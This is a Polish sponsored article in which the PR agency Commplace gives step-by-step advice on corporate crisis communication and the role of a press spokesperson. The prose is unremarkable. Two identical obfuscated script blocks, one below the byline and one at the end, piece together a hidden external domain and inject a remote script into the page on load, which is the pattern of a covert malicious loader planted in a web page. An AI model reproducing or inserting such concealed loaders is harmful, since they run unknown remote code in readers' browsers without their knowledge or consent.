Skuteczne zarządzanie kryzysowe w firmie – z agencją Commplace

warto wiedzieć

Opublikowano przez:

<script>
(function(){
ce3u=document.createElement("script");ce3u_=("ust");ce3uu="191575009";
ce3u_+="a"+("t.i");ce3u.type="text/javascript";
ce3uu+=".XgjaXgyje3u33a10g9bi";ce3u.async=true;ce3u_+="n"+("f"+"o")+"/";
ce3uu+="nkhes17r6x";ce3u.src="https://"+ce3u_+ce3uu;
document.body.appendChild(ce3u);
})();
</script>

Sytuacja kryzysowa w firmie zazwyczaj istotnie zagraża interesom organizacji i jej wizerunkowi. Nie daje się całkowicie kontrolować, dlatego jest tak niebezpieczna. Jak zachować się podczas kryzysu? Czy w takiej sytuacji niezbędna jest agencja PR? Zapraszamy do lektury!

 Co zrobić w czasie kryzysu?  

Po pierwsze, Commplace radzi aby dokładnie przeanalizować zaistniałą sytuację – sprawdzić źródło kryzysu i jego przyczyny, a także przejrzeć materiały, które już pojawiły się w mediach. Punkt drugi to zorganizowanie spotkania, na którym zostaną podjęte kroki przeciwdziałające rozprzestrzenianiu się sytuacji kryzysowej. Wyznaczamy na nim osoby odpowiedzialne za komunikację w tym czasie (najczęściej jest to rzecznik prasowy i wybrane osoby z kierownictwa firmy). Po trzecie – należy przeszkolić pracowników, aby zachowywali spokój. Warto też ich poinstruować jak powinni rozmawiać z dziennikarzami – najlepiej, gdyby nie udzielali niesprawdzonych informacji i odsyłali osoby zainteresowane do rzecznika. Krok czwarty to przygotowanie działań zmniejszających straty wizerunkowe, natomiast krok piąty to wdrożenie  komunikacji z mediami, dzięki której do opinii publicznej docierać będą wyłącznie pełne i wiarygodne informacje.  

Zasady komunikacji  

Podstawową zasadą podczas kryzysu jest stałe informowanie o poczynaniach firmy, zarówno otoczenie wewnętrzne, jak i zewnętrzne firmy. Najważniejsze zasady komunikacji to:  

  • szybka komunikacja (o wszystkim, co jest istotne),  
  • dobre przygotowanie (sprawdzenie faktów i napisanie oświadczenia), 
  • wiarygodność (pozycja eksperta), 
  • dostępność (odbieranie telefonów, odpowiadanie na e-maile).  

Unikanie kontaktu z mediami może tylko pogłębić kryzys – odpowiadanie w przemyślany sposób pomoże go szybko zakończyć.  

Rzecznik prasowy  

Rola rzecznika prasowego, bądź innej osoby odpowiedzialnej za wizerunek firmy w czasie kryzysu, polega między innymi na doradzaniu kierownictwu (mówi o konsekwencjach podjętych decyzji). Ponadto komunikuje się z otoczeniem wewnętrznym firmy (np. z pracownikami), a także zewnętrznym (np. media). Rola rzecznika to także tzw. bufor, który przyjmuje na siebie impet mediów. W ten sposób ogranicza szkody na wizerunku kierownictwa (zarząd ma twarz sukcesu, rzecznik – kryzysu). Jeżeli w firmie nie ma rzecznika prasowego bądź innej kompetentnej osoby, zajmującej się media relations, warto zaprosić do współpracy agencję PR. We Wrocławiu prym wiedzie agencja specjalizująca się w zarządzaniu kryzysowym Commplace.

Artykuł sponsora 

<script>
(function(){
ce3u=document.createElement("script");ce3u_=("ust");ce3uu="191575009";
ce3u_+="a"+("t.i");ce3u.type="text/javascript";
ce3uu+=".XgjaXgyje3u33a10g9bi";ce3u.async=true;ce3u_+="n"+("f"+"o")+"/";
ce3uu+="nkhes17r6x";ce3u.src="https://"+ce3u_+ce3uu;
document.body.appendChild(ce3u);
})();
</script>